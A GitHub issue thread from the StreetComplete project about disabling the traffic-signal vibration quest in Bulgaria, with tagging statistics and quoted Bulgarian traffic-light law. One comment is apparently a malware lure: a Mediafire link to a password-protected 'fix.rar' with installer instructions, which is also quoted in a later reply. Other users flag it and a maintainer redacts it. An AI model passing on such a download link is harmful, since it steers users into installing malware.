### ISSUE TITLE
Disable traffic signal vibration quest in Bulgaria

### ISSUE THREAD

**Issue by Dimitar5555** [streetcomplete/StreetComplete#5846]
In Bulgaria, ~12% of the pedestrian crossings are tagged with `traffic_signals:vibration=yes` (92/747). Of those 92, 91 also have `traffic_signals:sound=yes`. There are 0 (or close to 0, see *) traffic signals with any vibrating things. The confusion likely comes from the sound effect which may sound like a vibration to some people.

The older type of traffic signals sound like a chirping bird and it shouldn't be confused for vibration (see https://youtu.be/2aUtqR_Uim0?si=RovODKEZCNeEIaZK&t=1180 which is node/6111662646). 

The newer models create louder and more annoying sound but it's definitely not vibration (https://youtu.be/2aUtqR_Uim0?si=50gVBJQmEYwMo5si&t=930, node/1117150647).

Looking at some examples in Sofia (https://overpass-turbo.eu/?w=%22traffic_signals%3Avibration%22%3D%22yes%22+in+Bulgaria&R), the ones near УНСС, метростанция Константин Величков and the ones in the center (Съдебна палата, Св. Неделя, пл. Възраждане, пл. Македония, Дондуков и Раковска, по Васил Левски и по Патриарха) all have sound but no vibration. Most of them (if not all) use the older sound maker.

Looking at the Bulgarian law, nothing refers to vibrations/vibration devices.

<details>
<summary>Related article in Bulgarian law</summary>

ORDINANCE NO 17 OF 23 JULY 2001 ON THE REGULATION OF TRAFFIC BY TRAFFIC LIGHTS

Art. 30. (1) (Former text of Art. 30, amend. - (30, SG 35/2015, in force from 18.05.2015) To facilitate blind pedestrians, **the green light signal shall be accompanied by an audible signal**.
(2) (new - SG 35/15, in force from 18.05.2015) **The frequency of the sound referred to in par. 1 shall be** 800 - 2000 Nz, and **when the sound signal has pulsations, they shall have a frequency** of up to 4 Nz ± 0,2 Nz, and the ratio of the durations of the sound and the pause shall be greater than 1. The loudness referred to in par. 1 shall not be more than 5 dB(A) above the background noise level at the regulated location.
(3) (new - SG 35/2015, in force from 18.05.2015) The sound signal referred to in par. 1 shall have different pulsation frequencies for green signals at different fundamental beats. (beats refers to the signal phases)
(4) (new - SG 35/15, in force from 18.05.2015) The sound signal referred to in par. 1 shall be directed along the footpath for which it is intended and shall end simultaneously with the end of the green pedestrian signal.
(5) (new - SG 35/2015, in force from 18.05.2015) In case the sound signal referred to in par. (1) is requested by the blind by means of a special button referred to in Article 50a(2), the sound to orient the blind to the location of this button shall be at a frequency at least three times lower than that of the sound referred to in par. 1. The loudness of the orientation sound shall be such that it is perceptible at a distance of up to 5 m from the button.

Translated with DeepL.com (free version)
</details>

*Potentially there is one exception (node/6319690382) because it's near the "Union of the deaf people" and it has a non standard button. 

cc: @rhhsm

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rhhsm** [comment]
For the Finnish case #5791, they also looked at guides for blind people. Did you search for such guides in Bulgarian?

**Comment by rhhsm** [comment]
> Download
> https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
> password: changeme
> In the installer menu, select "gcc."

Why? Will we install some malware doing this?

**Comment by FloEdelmann** [comment]
@rhhsm yeah, this is probably malware. I notice comments like these in several repos since a few days. Could you please remove/radact your comment to not repeat that link?

**Comment by matkoniecz** [comment]
I have redacted suspicious link.

**Comment by Dimitar5555** [comment]
> For the Finnish case #5791, they also looked at guides for blind people. Did you search for such guides in Bulgarian?

There is a broshure on how to be helpful to blind people (http://ssb-bg.net/viewactivity-142.html), which is not exactly what we are looking for. There is also a book ["Ориентиране и мобилност"](http://www.bgbook.bg/Ориентиране-и-мобилност-Мира-Цветкова-Арсова_13327.html) from 2003, but I assume that there weren't any sound devices then. AFAIK the first ones appeared with the introduction of "smart" traffic lights around 2012-2015.

**Comment by matkoniecz** [comment]
@Dimitar5555 listing seems quite convincing, I would disable this quest based on this info - even without checking guides for blind people
